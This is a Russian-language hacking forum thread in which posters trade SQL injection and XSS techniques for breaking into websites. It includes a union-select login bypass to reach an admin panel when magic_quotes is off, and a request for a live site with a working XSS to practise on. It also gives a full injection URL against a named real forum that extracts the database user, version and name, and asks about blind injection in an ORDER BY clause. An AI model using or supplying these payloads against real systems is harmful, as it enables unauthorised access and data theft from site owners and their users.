2 SeNaP Там то, что вернет запрос (пароль) должно соответствовать тому, что в переменной p При волшебных_кавычках = офф login.php?login=-1'+union+select+123--+&p=123 Вроде так, если я не накосячил
SeNaP, откуда этот код ? Ты конкретный сайт хекаешь ? Кинь ссылку сюда либо мну в пм либо попробуй сам то что я написал .php?login=-1'+union+select+123--+&p=123 Ты должен попасть в админку (но только если magic_quotes_gpc=off)
плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a). все спомнил))) если надо то вот x3k.ru
все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса в случае истинности условия, ответ от сервера будет приходить с запозданием
У меня скорее просьба чем вопрос. Почитал много статей по XSS, скорее даже все. Напишите пожалуйста сюда или в личку страницу любую в инете с рабочей хсс и укажите поле, хочу попробовать найти т.к. не совсем верно понимаю систему поиска (в частности как страница реагирует на вводимые '';!--"<XSS>=&{()} например) и вообще в каком месте она должна реагировать
http://old.guoedu.ru/forum/?doc=115&act=forum&id=-2++union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9--&topic=6
суть вопроса. запрос: select ... from ... where ... order by act_(вот после этого я могу подставить что нить в запрос) в ответе можно веть по сортировке узнать как выполнился запрос но в том то и дело что таблица пустая из которой все это выводится. union тоже не прокатит после order версия mysql 4.x какие есть соображения?
